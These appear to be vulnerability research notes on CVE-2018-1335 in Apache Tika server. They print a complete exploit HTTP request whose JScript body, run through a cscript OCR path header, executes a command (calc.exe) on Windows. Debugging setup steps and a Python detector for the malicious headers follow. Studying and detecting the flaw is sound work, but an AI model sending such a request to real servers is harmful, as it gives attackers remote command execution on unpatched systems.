PoC: https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335
PUT /meta HTTP/1.1
Host: cqq.com:9998
Connection: close
User-Agent: python-requests/2.19.1
X-Tika-OCRTesseractPath: "cscript"
Content-type: image/jp2
Expect: 100-continue
X-Tika-OCRLanguage: //E:Jscript
Content-Length: 98

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');
Analysis: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
Reproduced only on Windows.
Affected: tika-server < 1.18
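A detection-side view of the request above, as an added example (not code from the original post or from the linked PoC): it parses raw HTTP requests and flags the two X-Tika-OCR headers that request carries. The host name tika.example, the language-code pattern and both sample requests are assumptions constructed for illustration.

```python
import re

# Header prefix seen in the request on this page
# (X-Tika-OCRTesseractPath, X-Tika-OCRLanguage).
OCR_PREFIX = "x-tika-ocr"
# Assumption: legitimate OCR language values look like "eng" or "eng+chi_sim".
LANG_RE = re.compile(r"[A-Za-z_]{2,20}(\+[A-Za-z_]{2,20})*")


def parse_headers(raw):
    """Parse the header section of a raw HTTP request into (name, value) pairs."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    pairs = []
    for line in head.splitlines()[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def findings(raw):
    """Return the list of reasons this request should raise an alert."""
    out = []
    for name, value in parse_headers(raw):
        if not name.startswith(OCR_PREFIX):
            continue
        option = name[len(OCR_PREFIX):]
        if option == "tesseractpath":
            out.append("client-supplied OCR executable path: " + value)
        elif option == "language" and not LANG_RE.fullmatch(value):
            out.append("OCR language is not a language code: " + value)
    return out


# Constructed samples: the first mirrors the headers of the request above
# (body omitted); the second is an ordinary OCR request.
SUSPICIOUS = (
    "PUT /meta HTTP/1.1\r\nHost: tika.example:9998\r\n"
    'X-Tika-OCRTesseractPath: "cscript"\r\n'
    "X-Tika-OCRLanguage: //E:Jscript\r\nContent-type: image/jp2\r\n\r\n"
)
BENIGN = (
    "PUT /meta HTTP/1.1\r\nHost: tika.example:9998\r\n"
    "X-Tika-OCRLanguage: eng+chi_sim\r\nContent-type: image/png\r\n\r\n"
)

if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(findings(sample) or "clean")
```

The same two checks can be applied at a reverse proxy in front of tika-server by dropping or rejecting any client request that carries an X-Tika-OCR header.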
Download: https://archive.apache.org/dist/tika/tika-server-1.17.jar
Start:
java -jar tika-server-1.17.jar
Debugging
As usual, following earlier remote-debugging experience, start tika-server with the debug parameters set:
$ java -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 -jar ./target/tika-server-1.17.jar -h 192.168.170.139
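As shown in the figure, once the Debug button is clicked in IDEA, it connects to that port.
Then import the server directory into IntelliJ IDEA, along with the parser directory (it will be needed); otherwise the debugger cannot step into that part of the source.
Then allow the Maven sync in the lower-right corner; some dependency packages need to be downloaded so the source can be debugged.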